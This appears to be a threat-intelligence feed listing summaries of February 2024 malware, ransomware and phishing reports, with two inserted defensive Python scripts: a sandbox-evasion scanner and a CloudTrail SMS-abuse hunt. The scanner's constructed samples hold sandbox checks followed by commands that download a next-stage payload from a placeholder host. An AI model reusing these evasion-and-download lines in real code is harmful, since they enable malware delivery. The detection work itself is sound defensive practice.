- ISC.SANS researchers examined a malware sample whose anti-sandbox methods rely on simple checks that can be performed from a plain Windows batch (.bat) script. One intriguing check, a test for the presence of a mouse, gates the download of the next payload: the script only fetches the next stage if the check passes.
Source:
https://isc.sans.edu/diary/Simple+AntiSandbox+Technique+Wheres+The+Mouse/30684/
—
- Intel Source:
- Cofense
- Intel Name:
- New_MaaS_InfoStealer_Malware_Campaign
- Date of Scan:
- 2024-02-23
- Impact:
- LOW
- Summary:
- Cofense researchers discussed in their post a new phishing campaign targeting the oil and gas industry, which uses a recently updated Malware-as-a-Service called Rhadamanthys Stealer. The campaign starts with a phishing email and leads to a clickable PDF file that downloads the malware. The Rhadamanthys Stealer is written in C++ and has various features to steal information. The article also mentions that the malware recently received a major update, making it more customizable for threat actors. A table of indicators of compromise is provided, and the article concludes by stating that more details will be provided in the future.
Source:
https://cofense.com/blog/new-maas-infostealer-malware-campaign-targeting-oil-gas-sector/
—
- Intel Source:
- Trustwave
- Intel Name:
- A_discovery_of_the_phishing_as_a_service_Tycoon_Group
- Date of Scan:
- 2024-02-22
- Impact:
- LOW
- Summary:
- A phishing-as-a-service called Tycoon Group was discovered recently. It uses sophisticated techniques like WebSocket for data exfiltration and Cloudflare for evading detection. Available since August 2023, it enables easy deployment of phishing pages mimicking Microsoft and Google login. It provides an admin panel to manage campaigns and view stolen credentials.
—
- Intel Source:
- Medium
- Intel Name:
- Konni_RAT_Malware_Backdoored_into_Russian_Government_Software
- Date of Scan:
- 2024-02-22
- Impact:
- LOW
- Summary:
- A backdoored installer for a utility probably used by the Consular Department of Russia’s Ministry of Foreign Affairs (MID) has been found distributing the Konni RAT (also known as UpDog). According to DCSO analysts, hiding Konni in software installers is a tactic the group already used in October 2023, when the trojan was distributed through a backdoored copy of the Russian tax-filing software Spravki BK. The utility trojanized in this case is ‘Statistika KZU’ (Статистика КЗУ).
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malware_Compromises_Personal_Data_Through_Vibrator_Infection
- Date of Scan:
- 2024-02-22
- Impact:
- LOW
- Summary:
- The article describes an incident in which a vibrator, specifically the Spencer’s Sexology Pussy Power 8-Function Rechargeable Bullet Vibrator, was found carrying an information stealer named Lumma. Lumma is sold on a Malware-as-a-Service (MaaS) model, in which cybercriminals pay other cybercriminals for access to the malware and its infrastructure. Lumma’s primary purpose is to steal data from cryptocurrency wallets, browser extensions, and two-factor authentication applications. While Lumma is commonly distributed through email campaigns, this case highlights its potential spread through infected USB storage devices as well.
Source:
https://www.malwarebytes.com/blog/news/2024/02/vibrator-virus-steals-your-personal-information
—
- Intel Source:
- Aqua Sec
- Intel Name:
- DDoS_Botnet_Lucifer_Targeting_Apache_Big_Data_Stack
- Date of Scan:
- 2024-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers at Aqua Security have identified a new campaign targeting Apache Hadoop and Apache Druid big-data stacks with the Lucifer DDoS botnet malware. Observed against Aqua’s cloud-hosted Apache honeypots, the attacker exploits known vulnerabilities and misconfigurations in these services to gain access and deploy the malware.
Source:
https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/
—
- Intel Source:
- Huntress
- Intel Name:
- Decrypted_HomuWitch_Ransomware
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- HomuWitch is a ransomware strain that first emerged in July 2023. While investigating the threat, Huntress analysts found a flaw in its encryption process that lets victims recover all their files without paying the ransom, and used it to build a free decryption tool for all HomuWitch victims.
Source:
https://malware.news/t/decrypted-homuwitch-ransomware/78949
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Malicious_Campaigns_Exploiting_Google_Cloud_Run_in_LATAM
- Date of Scan:
- 2024-02-21
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers have observed several banking trojans, including Astaroth (also known as Guildma), Mekotio, and Ousaban, being distributed to targets across Europe and Latin America through abuse of Google Cloud Run in high-volume malware distribution campaigns. The volume of email tied to these campaigns has grown sharply since September 2023, and Talos continues to monitor for new distribution campaigns. The infection chains for the various malware families share the use of malicious Microsoft Installer (MSI) files that act as droppers or downloaders for the final payloads.
Source:
https://blog.talosintelligence.com/google-cloud-run-abuse/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Information_Campaign_Regarding_War_That_Targets_Speakers_of_Ukrainian
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- Operation Texonto is a disinformation/PSYOP campaign that delivers its message mainly by spam email. Notably, the operators do not appear to have used popular platforms such as Telegram, or fake websites, to spread their claims. ESET identified two distinct waves, in November 2023 and at the end of December 2023. The email topics, typical of Russian propaganda, included food shortages, medicine shortages, and heating outages.
—
- Intel Source:
- Lab52 blog
- Intel Name:
- The_deployment_of_the_Kazuar_malware
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- This article examines a new sample used by the Turla APT group in its attacks: a wrapper called Pelmeni that deploys the Kazuar backdoor. The sample is compared with an earlier one, confirming a substitution algorithm similar to Kazuar’s, a new protocol for exfiltration, and a different log folder. Indicators of compromise and sample hashes are provided. The section titled “Pelmeni Wrapper” gives a detailed analysis of the wrapper’s structure and functions; the article also reviews Turla’s history and its use of DLL sideloading, and a final section analyzes the .NET binary extracted from the wrapper.
Source:
https://lab52.io/blog/pelmeni-wrapper-new-wrapper-of-kazuar-turla-backdoor/
—
- Intel Source:
- Cado Security Labs
- Intel Name:
- Migo_Malware_Targeting_Redis_for_Cryptocurrency_Mining
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- Researchers from Cado Security Labs have encountered a new malware campaign that focuses on exploiting Redis for initial access. Although Redis has been a common target for Linux and cloud-centric attackers, this specific campaign employs unique system weakening techniques against the data store. The malware, known as Migo, is designed by its developers to compromise Redis servers with the goal of cryptocurrency mining on the underlying Linux host.
Source:
https://www.cadosecurity.com/migo-a-redis-miner-with-novel-system-weakening-techniques/
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Malicious_Actors_Exploiting_Open_Source_Code_in_Software_Supply_Chains
- Date of Scan:
- 2024-02-21
- Impact:
- LOW
- Summary:
- The article explores the growing trend of cybercriminals utilizing open-source code and package managers for malicious activities. Instead of relying on traditional methods like spearphishing, attackers are now planting malware in open-source repositories. The emergence of DLL sideloading attacks, typically associated with compromised environments, is now evident in open-source incidents. The identification of malicious PyPI packages underscores a broader pattern of cyber threats leveraging DLL sideloading to compromise software supply chains. This highlights the importance of increased security monitoring and integrity checks for both software producers and organizations.
Source:
https://www.reversinglabs.com/blog/attackers-leverage-pypi-to-sideload-malicious-dlls
—
- Intel Source:
- Cyble
- Intel Name:
- Advanced_version_of_ObserverStealer_AsukaStealer_malware
- Date of Scan:
- 2024-02-20
- Impact:
- MEDIUM
- Summary:
- The article describes a new information-stealing malware called AsukaStealer, offered as a service on Russian cybercrime forums. It is a revamped version of ObserverStealer. The article maps its tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK framework, covering credential access, discovery (including remote system discovery), and collection, and provides indicators of compromise (IoCs) such as IP addresses and file hashes.
—
- Intel Source:
- bleepingcomputer
- Intel Name:
- Hackers_Exploit_Critical_RCE_Flaw_In_Bricks_Builder_Theme
- Date of Scan:
- 2024-02-20
- Impact:
- LOW
- Summary:
- The article reports active exploitation of a critical vulnerability in the widely used Bricks Builder theme for WordPress, which has roughly 25,000 installations. The flaw allows unauthenticated attackers to execute arbitrary PHP code (RCE); it stems from an eval call inside the ‘prepare_query_vars_from_settings’ function. Patchstack reported the vulnerability to the Bricks team, who released a fix in version 1.9.6.1 on February 13. Exploitation in the wild was observed shortly after the patch was published, so users are strongly advised to upgrade immediately.
—
- Intel Source:
- Google Blog
- Intel Name:
- Iranian_and_Hezbollah_Hackers_Attack_to_Influence_Israel_Hamas_Narrative
- Date of Scan:
- 2024-02-20
- Impact:
- MEDIUM
- Summary:
- Iran- and Hezbollah-backed actors carried out cyberattacks intended to undermine public support for the war after October 2023. These included destructive attacks on key Israeli institutions, hack-and-leak operations against American and Israeli organizations, phishing campaigns to gather intelligence, and disinformation to turn public opinion against Israel. In the six months before the October 7 attacks, Iran accounted for almost eighty percent of all government-backed phishing activity directed at Israel.
Source:
https://blog.google/technology/safety-security/tool-of-first-resort-israel-hamas-war-in-cyber/
—
- Intel Source:
- Trendmicro
- Intel Name:
- Earth_Preta_Campaign_Targets_Asian_Countries_with_DOPLUGS
- Date of Scan:
- 2024-02-20
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers found that Earth Preta’s customized PlugX variant differs from standard PlugX: it serves only as a downloader for the full PlugX and lacks a complete backdoor command module. Because of these distinctive features they named the variant DOPLUGS. Further investigation showed that DOPLUGS incorporates the KillSomeOne module.
Source:
https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html
—
- Intel Source:
- CyberGeeks
- Intel Name:
- The_technical_analysis_of_the_Backmydata_ransomware
- Date of Scan:
- 2024-02-20
- Impact:
- LOW
- Summary:
- The article provides a technical analysis of the BackMyData ransomware used against hospitals in Romania. The abstract summarizes the ransomware’s actions, including encryption of files with AES-256 and dropping of ransom notes. The technical analysis section walks through the code and its methods, such as disabling the firewall and deleting Volume Shadow Copies, and explains how the ransomware establishes persistence and encrypts files with specific extensions. Indicators of compromise and references for further reading are provided.
—
- Intel Source:
- BfV & NIS
- Intel Name:
- Hackers_from_North_Korea_Linked_to_Defense_Sector_Supply_Chain_Attack
- Date of Scan:
- 2024-02-20
- Impact:
- MEDIUM
- Summary:
- South Korea’s National Intelligence Service (NIS) and Germany’s Federal Office for the Protection of the Constitution (BfV) have issued a joint advisory on an ongoing cyber-espionage campaign conducted on behalf of the North Korean government against the global defense sector. The attacks aim to steal information on advanced military technology to help North Korea modernize its conventional weapons and develop new military capabilities.
—
- Intel Source:
- Sucuri
- Intel Name:
- RemoteRATRemoval_types_and_mitigation
- Date of Scan:
- 2024-02-20
- Impact:
- LOW
- Summary:
- The article titled “Remote Access Trojan (RAT): Types, Mitigation & Removal” gives an overview of RATs, malware that lets attackers gain remote access to and control over infected systems. It covers the main types of RATs, their infiltration techniques, command-and-control communication, and stealth mechanisms, as well as the consequences of RAT infections, including data theft, botnet enrollment, and ransomware deployment. It then turns to website security: how compromised websites are used to spread RAT infections, how to remove a RAT, and how to protect against them, closing with website security best practices and a recommendation to use a web application firewall.
Source:
https://blog.sucuri.net/2024/02/remote-access-trojan-rat-types-mitigation-removal.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Dynamic_Sandbox_Detection_in_Python_InfoStealer
- Date of Scan:
- 2024-02-20
- Impact:
- LOW
- Summary:
- Python-based infostealers are not new, and many incorporate sandbox-detection methods to avoid executing (and probably being detected) under automated analysis. ISC.SANS researchers found one last week that takes a similar but distinct approach: such scripts normally embed a static list of “bad stuff” to look for, such as user names, process names, and MAC addresses, whereas this sample’s sandbox detection is dynamic.
Source:
https://isc.sans.edu/diary/Python+InfoStealer+With+Dynamic+Sandbox+Detection/30668/
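Both the batch-file checks in the Anti_Sandbox_Techniques entry above and the user/process/MAC lists described here are simple enough to spot statically before detonating a sample. The script below is an added example, not code from either ISC diary: it scans a script line by line for common sandbox-evasion indicators and reports whether a check precedes a runtime download (the “check first, then fetch the next stage” pattern). The rule table is an assumption about commonly seen checks, not an exhaustive list, and the three sample scripts are constructed stand-ins, not the scripts the diaries analyzed.

```python
"""
Static triage of scripts for sandbox-evasion indicators.

Added example: not code from either ISC diary. The malicious samples below are
constructed stand-ins, not the scripts the diaries analyzed. The rule table is
an assumption about commonly seen checks, not an exhaustive list.
"""
import re
from dataclasses import dataclass

# (category, pattern, reason). Patterns are matched case-insensitively per line.
RULES = [
    ("hardware", r"win32_pointingdevice|GetSystemMetrics\s*\(\s*(19|SM_MOUSEPRESENT)",
     "checks whether a mouse is present"),
    ("hardware", r"win32_videocontroller|win32_computersystem|totalphysicalmemory|numberofprocessors",
     "probes hardware inventory (RAM, CPUs, GPU)"),
    ("username", r"getuser|%username%|whoami",
     "inspects the current user name"),
    ("process", r"tasklist|process_iter|vboxservice|vmtoolsd|wireshark|procmon|x64dbg|ollydbg",
     "enumerates processes or looks for analysis tools"),
    ("mac", r"getnode\(\)|getmac|08[:-]?00[:-]?27|00[:-]?0c[:-]?29|00[:-]?50[:-]?56",
     "checks the MAC address for hypervisor OUIs (VirtualBox, VMware)"),
    ("timing", r"\bsleep\b|timeout\s+/t|GetTickCount|QueryPerformanceCounter",
     "delay or timing-based check"),
    ("fetch", r"urlopen|requests\.get|Invoke-WebRequest|bitsadmin|certutil.*urlcache|curl\b",
     "fetches data at runtime (next stage or a dynamic blocklist)"),
]
COMPILED = [(cat, re.compile(pat, re.IGNORECASE), why) for cat, pat, why in RULES]


@dataclass(frozen=True)
class Finding:
    category: str
    line_no: int
    line: str
    reason: str


def scan_script(text: str) -> list[Finding]:
    """Return every (rule, line) hit in the script, in line order."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for category, rx, reason in COMPILED:
            if rx.search(line):
                findings.append(Finding(category, n, line.strip(), reason))
    return findings


def categories(findings: list[Finding]) -> list[str]:
    return sorted({f.category for f in findings})


def gates_download(findings: list[Finding]) -> bool:
    """True when an environment check appears before the first runtime fetch,
    i.e. the download of the next stage is conditional on passing the check."""
    checks = [f.line_no for f in findings if f.category != "fetch"]
    fetches = [f.line_no for f in findings if f.category == "fetch"]
    return bool(checks) and bool(fetches) and min(checks) < min(fetches)


# Constructed sample 1: batch file that aborts without a pointing device.
BAT_SAMPLE = r"""
@echo off
rem constructed sample: abort when no pointing device is present
wmic path Win32_PointingDevice get DeviceID | find "DeviceID" >nul || exit /b
timeout /t 20 >nul
powershell -c "Invoke-WebRequest http://example.invalid/stage2.exe -OutFile %TEMP%\s2.exe"
"""

# Constructed sample 2: Python stealer with static user / MAC / process lists.
PY_SAMPLE = r"""
import getpass, uuid, psutil, urllib.request
BAD_USERS = ["sandbox", "maltest", "virus", "john doe"]
if getpass.getuser().lower() in BAD_USERS:
    raise SystemExit
mac = "%012x" % uuid.getnode()
if mac.startswith(("080027", "000c29", "005056")):
    raise SystemExit
for p in psutil.process_iter(["name"]):
    if p.info["name"].lower() in ("vboxservice.exe", "vmtoolsd.exe", "wireshark.exe"):
        raise SystemExit
blob = urllib.request.urlopen("http://example.invalid/payload").read()
"""

# Constructed sample 3: benign script, should produce no findings.
BENIGN_SAMPLE = r"""
import json
print(json.dumps({"status": "ok"}))
"""

if __name__ == "__main__":
    for name, src in (("bat", BAT_SAMPLE), ("py", PY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        hits = scan_script(src)
        print(name, categories(hits), "gated download:", gates_download(hits))
        for h in hits:
            print(f"  L{h.line_no} [{h.category}] {h.reason}: {h.line}")
```

A sample that hits the hardware, username, process or mac categories and then fetches something is worth detonating with a mouse attached, a realistic user name and the usual hypervisor processes renamed; a dynamic sample (fetch before any check) needs network capture to recover its blocklist.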
—
- Intel Source:
- S2W Blog
- Intel Name:
- Cybercriminals_Using_RustDoor_and_GateDoor_as_Fake_Software
- Date of Scan:
- 2024-02-19
- Impact:
- LOW
- Summary:
- S2W’s threat intelligence center identified the Rust-based macOS malware RustDoor in December 2023 and has been tracking it since. Further investigation uncovered a Windows counterpart, written in Go rather than Rust, which they named GateDoor. Both RustDoor and GateDoor are distributed disguised as legitimate software updates or applications.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Attackers_Using_Mirai_Botnet_on_Open_Internet
- Date of Scan:
- 2024-02-19
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have examined how hackers are utilizing the Mirai Botnet malware to target openly accessible Internet of Things devices and take advantage of security holes.
Source:
https://isc.sans.edu/diary/MiraiMirai+On+The+Wall+Guest+Diary/30658
—
- Intel Source:
- Trellix
- Intel Name:
- Deep_Dive_into_MrAgent_and_Ransomware_Negotiations
- Date of Scan:
- 2024-02-19
- Impact:
- MEDIUM
- Summary:
- Trellix profiles RansomHouse, a Ransomware-as-a-Service group known for its MrAgent tool, which automates ransomware deployment. The analysis covers the group’s focus on double extortion, its targeting strategy, its negotiation tactics with victims, and the technical workings of MrAgent, and follows the financial trail of ransom payments for insight into the group’s operational and financial tactics.
Source:
https://www.trellix.com/blogs/research/ransomhouse-am-see/
—
- Intel Source:
- Recorded Future
- Intel Name:
- TAG_70_Hackers_Targeting_European_Government_and_Military_Mail_Servers
- Date of Scan:
- 2024-02-19
- Impact:
- LOW
- Summary:
- Recorded Future researchers have observed TAG-70 exploiting cross-site scripting (XSS) vulnerabilities in European Roundcube webmail servers, specifically targeting organizations associated with national infrastructure, the military, and government. TAG-70 overlaps with activity reported by other security vendors as Winter Vivern, TA473, and UAC-0114. The group has been active since at least December 2020, mainly targets governments in Europe and Central Asia, and likely conducts cyber-espionage to further the interests of Belarus and Russia.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2024-0217.pdf
—
- Intel Source:
- CyberMasterV
- Intel Name:
- An_Analysis_of_BackMyData_Ransomware_That_Attacked_Romanian_Hospitals
- Date of Scan:
- 2024-02-19
- Impact:
- LOW
- Summary:
- Researchers report that a ransomware attack beginning on February 11 forced about 100 hospitals in Romania to take their computer systems offline. The BackMyData ransomware used in the attack belongs to the Phobos family. The malware embeds an AES key used to decrypt its configuration, which lists whitelisted files, directories, and extensions and includes a public RSA key used to encrypt the per-file AES keys that encrypt the data.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Agniane_information_stealer_malware
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- Agniane Stealer is an information-stealing malware that targets its victims’ cryptocurrency wallets. Analyzing a recent campaign, Cisco Talos analysts identified and documented a previously unrecognized network URL pattern and uncovered further details of the malware’s file-collection methods and its command and control (C2) protocol.
Source:
https://blogs.cisco.com/security/agniane-stealer-information-stealer-targeting-cryptocurrency-users
—
- Intel Source:
- Rapid7
- Intel Name:
- Unauthorized_access_to_two_publicly_facing_Confluence_servers
- Date of Scan:
- 2024-02-16
- Impact:
- MEDIUM
- Summary:
- Rapid7 Incident Response investigated an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions. Rapid7 identified evidence of exploitation for CVE-2023-22527 within available Confluence logs. During the investigation, Rapid7 identified cryptomining software and a Sliver Command and Control (C2) payload on in-scope servers.
Source:
https://www.rapid7.com/blog/post/2024/02/15/rce-to-sliver-ir-tales-from-the-field/
—
- Intel Source:
- CERT-AGID
- Intel Name:
- TA544_Exploiting_Danabot_Malware_Again
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- Three months after the last wave in November 2023, a significant campaign is again targeting Italian users with the Revenue Agency (Agenzia delle Entrate) lure to spread malware. This wave seeks to install Danabot on victims’ devices to gain unauthorized access to sensitive data. It is attributed to the criminal group TA544, which specializes in targeted spear-phishing and social-engineering attacks and is known for distributing the Gozi/Ursnif malware.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_spread_of_utility_scam_campaign_thru_online_ads
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- The Malwarebytes blog explains how utility scams work: criminals pose as the victim’s utility company, threaten disconnection, and extort as much money as they can. Analysts observed and collected many fraudulent utility-scam ads and the fake sites they lead to, showing how the scam spreads through online advertising.
—
- Intel Source:
- Symantec
- Intel Name:
- Comparative_Analysis_of_Alpha_and_NetWalker_Ransomware_Versions
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- Analyzing Alpha reveals that it is a lot like the previous version of the NetWalker ransomware. The payload is delivered by a similar PowerShell-based loader in both threats. Furthermore, there is a substantial amount of code overlap between the payloads for Alpha and NetWalker.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/alpha-netwalker-ransomware
—
- Intel Source:
- SentinelLabs
- Intel Name:
- A_Novel_AWS_SNS_based_Smishing_Attack_Tool
- Date of Scan:
- 2024-02-16
- Impact:
- LOW
- Summary:
- SentinelLabs discovered SNS Sender, a novel tool that abuses AWS’s Simple Notification Service (SNS) for smishing (SMS phishing) campaigns. Authored by ARDUINO_DAS, a figure already known in the phishing scene, the tool marks a shift in how threat actors leverage cloud services for malicious activity: it uses AWS SNS for bulk SMS spamming to distribute phishing links, often posing as USPS notifications about missed package deliveries.
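A tool like this runs on a compromised AWS account, so the defender’s side of the story is the account owner’s CloudTrail. The following is an added example, not part of the SentinelLabs report and not SNS Sender itself: it flags any principal that publishes direct-to-phone SMS to an unusually large number of distinct numbers within a short window. It assumes CloudTrail data-event logging for sns:Publish is enabled and that records carry the usual CloudTrail fields (eventTime, eventSource, eventName, userIdentity.arn, and requestParameters with phoneNumber for direct SMS or topicArn for topic publishes); the records it runs over are constructed.

```python
"""
Hunting for SNS-based bulk SMS abuse in CloudTrail.

Added example, not part of the SentinelLabs report and not SNS Sender itself.
Assumptions: CloudTrail data-event logging for sns:Publish is enabled, and
records carry the usual fields (eventTime, eventSource, eventName,
userIdentity.arn, requestParameters.phoneNumber / topicArn). All records
below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def _ts(s: str) -> datetime:
    """CloudTrail eventTime is ISO-8601 UTC with a trailing Z."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_bulk_sms_senders(records, threshold=20, window=timedelta(minutes=5)):
    """Map each principal that sent direct SMS to more than `threshold` distinct
    phone numbers within any `window` to its worst-window count. Topic
    publishes are ignored: smishing needs phone numbers, not topics."""
    by_principal = defaultdict(list)
    for r in records:
        if r.get("eventSource") != "sns.amazonaws.com" or r.get("eventName") != "Publish":
            continue
        phone = (r.get("requestParameters") or {}).get("phoneNumber")
        if not phone:
            continue
        by_principal[r["userIdentity"]["arn"]].append((_ts(r["eventTime"]), phone))

    hits = {}
    for arn, events in by_principal.items():
        events.sort()
        start = 0
        for end in range(len(events)):          # sliding window over sorted events
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({p for _, p in events[start:end + 1]})
            if distinct > threshold:
                hits[arn] = max(hits.get(arn, 0), distinct)
    return hits


def _record(arn, when, phone=None, topic_arn=None):
    """Build a constructed CloudTrail-shaped Publish record."""
    params = {"message": "<redacted>"}
    if phone:
        params["phoneNumber"] = phone
    if topic_arn:
        params["topicArn"] = topic_arn
    return {
        "eventTime": when.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "eventSource": "sns.amazonaws.com",
        "eventName": "Publish",
        "userIdentity": {"arn": arn},
        "requestParameters": params,
    }


T0 = datetime(2024, 2, 16, 12, 0, 0, tzinfo=timezone.utc)
ATTACKER = "arn:aws:iam::123456789012:user/ci-deploy"               # constructed: stolen key
OTP = "arn:aws:sts::123456789012:assumed-role/otp-service/i-0abc"  # constructed: legitimate use

SAMPLE_RECORDS = (
    # 60 SMS to 60 distinct numbers in two minutes: the smishing blast
    [_record(ATTACKER, T0 + timedelta(seconds=2 * i), phone=f"+1555010{i:04d}") for i in range(60)]
    # 5 one-time-passcode texts spread over 40 minutes: normal
    + [_record(OTP, T0 + timedelta(minutes=10 * i), phone=f"+1555020{i:04d}") for i in range(5)]
    # topic publishes carry no phone number and are ignored
    + [_record(OTP, T0, topic_arn="arn:aws:sns:us-east-1:123456789012:alerts") for _ in range(3)]
)

if __name__ == "__main__":
    for arn, count in find_bulk_sms_senders(SAMPLE_RECORDS).items():
        print(f"{arn}: {count} distinct numbers in a 5-minute window")
```

The threshold is a tuning knob: an OTP service legitimately texts many distinct numbers, so baseline per principal first and alert on deviation, and pair the rule with a budget alarm on SMS spend, which is where this kind of abuse is usually noticed otherwise.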
—
- Intel Source:
- SentinelOne
- Intel Name:
- Kryptina_RaaS
- Date of Scan:
- 2024-02-15
- Impact:
- LOW
- Summary:
- SentinelOne analysts detail in their blog the development, technical details and implications of the Kryptina RaaS and its move into open-source crimeware.
Source:
https://www.sentinelone.com/blog/kryptina-raas-from-underground-commodity-to-open-source-threat/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Advanced_Cybercriminals_rapidly_diversify_cyberattack_channels
- Date of Scan:
- 2024-02-15
- Impact:
- MEDIUM
- Summary:
- EclecticIQ analysts examined the recent Ivanti vulnerabilities and the infrastructure tied to the earliest reporting of their exploitation, and described new, previously unreported infrastructure that may be linked to similar exploit attempts.
—
- Intel Source:
- Zerofox
- Intel Name:
- New_Tax_Fraud_Scheme
- Date of Scan:
- 2024-02-15
- Impact:
- LOW
- Summary:
- This month the Russian threat actor “Journalist” posted on the Russian-speaking forum “Coockie Pro” a method of abusing the legitimate gocardless[.]com service to look up corporate Employer Identification Numbers (EINs) for use in tax fraud schemes against U.S. citizens.
—
- Intel Source:
- Huntress
- Intel Name:
- Data_Leakage_via_Finger
- Date of Scan:
- 2024-02-15
- Impact:
- LOW
- Summary:
- Huntress researchers revisited an earlier Windows Defender detection, surfaced as a “Managed Antivirus” (MAV) alert, and found a finger.exe command line that sent a string of digits to the IP address linked to the November activity: the finger protocol being used as a covert data channel.
Source:
https://www.huntress.com/blog/threat-intel-accelerates-detection-and-response
—
- Intel Source:
- Fortinet
- Intel Name:
- TicTacToe_Dropper_Analysis
- Date of Scan:
- 2024-02-15
- Impact:
- MEDIUM
- Summary:
- While analyzing new malware samples collected from several victims, the FortiGuard researchers identified a grouping of malware droppers used to deliver various final-stage payloads throughout 2023.
Source:
https://www.fortinet.com/blog/threat-research/tictactoe-dropper
—
- Intel Source:
- Cisco Talos
- Intel Name:
- TinyTurla_Next_Generation
- Date of Scan:
- 2024-02-15
- Impact:
- LOW
- Summary:
- Cisco Talos has observed a new backdoor operated by the Turla APT group, a Russian cyber-espionage threat actor. The new backdoor, “TinyTurla-NG” (TTNG), resembles another Turla backdoor, TinyTurla, in coding style and functionality.
Source:
https://blog.talosintelligence.com/tinyturla-next-generation/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Phishing_Attacks_Using_Remote_Monitoring_and_Management_Software
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes have investigated a specific phishing scheme using the AnyDesk remote software to target business users. IT administrators may streamline activities and ensure network integrity remotely with the use of popular products like AnyDesk, Atera, and Splashtop, which are examples of remote monitoring and management (RMM) software. Cybercriminals, however, have noticed these same tools and are using them to breach corporate networks and steal confidential information.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Malware_development_competition
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has observed a sharp rise in malware being distributed on a Russian hacking forum at no cost. The forum administrators had announced a malware development competition on 1st November 2023.
Source:
https://www.cyfirma.com/outofband/malware-development-competition-fuels-creation-of-20-malware/
—
- Intel Source:
- ReliaQuest
- Intel Name:
- Emergence_of_Novel_SocGholish_Infection_Chain
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- ReliaQuest researchers found suspicious JavaScript files in client environments, such as “update.js,” a file name frequently used by malware that poses as a software update, as SocGholish does. Examining execution of the first-stage payload, they discovered a novel characteristic of this malware: the use of Python for persistence.
Source:
https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_sophisticated_GoBased_JKwerlo_ransomware_variant
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- Cyble researchers analyzed a new, sophisticated Go-based JKwerlo ransomware variant that targets French- and Spanish-speaking users.
Source:
https://cyble.com/blog/new-go-based-jkwerlo-ransomware-poses-a-risk-to-french-and-spanish-users/
—
- Intel Source:
- trendmicro
- Intel Name:
- Water_Hydra_Exploits_Zero_Day_Vulnerabilities
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- The APT group Water Hydra has been exploiting a Microsoft Defender SmartScreen bypass vulnerability (CVE-2024-21412) in attacks against financial market traders. The Trend Micro Zero Day Initiative discovered and disclosed the vulnerability, which Microsoft has since patched.
—
- Intel Source:
- Volexity
- Intel Name:
- CharmingCypress_malware_family
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- Volexity’s post shares observations of CharmingCypress malware family activity from 2023 to early 2024, including details on the techniques the threat actor has used to distribute the malware.
Source:
https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Malware_spread_via_YouTube_Videos
- Date of Scan:
- 2024-02-14
- Impact:
- LOW
- Summary:
- Cybereason has observed threat actors abusing older YouTube accounts to host links to malware, including infostealers such as RedLine and Raccoon Stealer and other commodity malware such as SmokeLoader, disguised as cracked versions of popular paid software.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_Mirai_Bot_Exploits_Bytevalue_Router_Vulnerability
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- ISC.SANS researchers examined a URL that appeared in their “First Seen” list. Initially the sensors saw requests for “goform/webRead/open” only. URLs containing “goform” are usually associated with the RealTek SDK, which routers built around RealTek SoCs (systems on a chip) commonly use to implement their web management interfaces; the RealTek SDK has had many vulnerabilities in the past. The honeypots currently track more than 900 distinct URLs containing “/goform/”.
—
- Intel Source:
- HHS GOV
- Intel Name:
- In_depth_examination_of_Akira_ransomware
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- In its brief existence, the Akira ransomware group has proven to be a formidable and proficient adversary to the U.S. healthcare sector. Akira reuses many common elements in its operations and targeting, and operates as ransomware-as-a-service (RaaS): the core group concentrates on the ransomware itself while affiliates carry out targeted attacks and split the extorted proceeds.
Source:
https://www.hhs.gov/sites/default/files/akira-randsomware-analyst-note-feb2024.pdf
—
- Intel Source:
- Proofpoint
- Intel Name:
- Cyberattack_Targeting_Executives_Using_Microsoft_Azure
- Date of Scan:
- 2024-02-13
- Impact:
- MEDIUM
- Summary:
